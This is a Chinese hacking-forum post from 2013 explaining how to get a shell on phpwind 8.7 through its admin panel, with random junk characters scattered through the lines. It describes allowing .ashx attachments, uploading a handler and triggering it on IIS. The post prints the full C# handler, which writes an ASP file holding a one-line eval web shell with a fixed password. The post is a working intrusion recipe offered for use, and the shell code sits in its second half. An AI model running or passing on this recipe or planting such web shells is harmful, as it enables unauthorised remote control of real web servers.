找回密码
 立即注册
查看: 3351|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
) L" E$ p; i" \& h8 I
" Z" A5 v  `) L9 z  N群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx4 f( ?# Q; ~; K2 L" l' x( [" L6 Y

8 g+ [3 V+ s, J3 ?$ {! P# k) G发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
& z* G2 |/ {3 X ! X/ h" d  j' P2 \8 \) L. \
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx, L4 G- U/ {/ x+ f

8 d9 E: _1 E. d/ l+ X! h打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
2 o. [* a  v& {. T5 N& Y ) ]4 g$ Z4 u6 U; P( ]: t
下面是代码:
' t8 K; B3 @% x& r! i4 l- D2 o5 l9 a
' C$ x  s! [' I. O# `# V<%@ WebHandler Language="C#"Class="Handler" %>6 P& H  K  F! ~
using System;
& g. V; L5 e: i" Eusing System.Web;
" W+ G  d' O. S8 y1 c, @using System.IO;
/ W4 p) M$ y, {: H5 }( dpublic class Handler : IHttpHandler {) ^( M( |- M  a6 W1 a5 ~8 y8 ~
public void ProcessRequest (HttpContext context) {" s: ^: U" x. J' D: y# D: |( b  E
context.Response.ContentType = "text/plain";; T' d3 e' \9 m1 e
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
- p7 r$ Z4 a( p& W& W- Hfile1.Write("<%eval request(\"r00ts\")%>");+ T/ W2 A2 R" S, w/ ^6 W+ }
file1.Flush();" P0 G: G$ m5 l) v% e- v
file1.Close();
: r: I  V2 T3 _}- y6 J# F' J5 W5 {% V, r3 i9 ^
public bool IsReusable {
: J0 f! U. x% ?- i: aget {
5 m' C' y- W6 [9 V! f/ ^$ B" ]return false;
, \: j; }0 h# _; J9 m4 Z}) t% @* J. @, x' W( M1 e
}( I: H5 U7 t: K
}
; ]3 U9 B/ G% ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表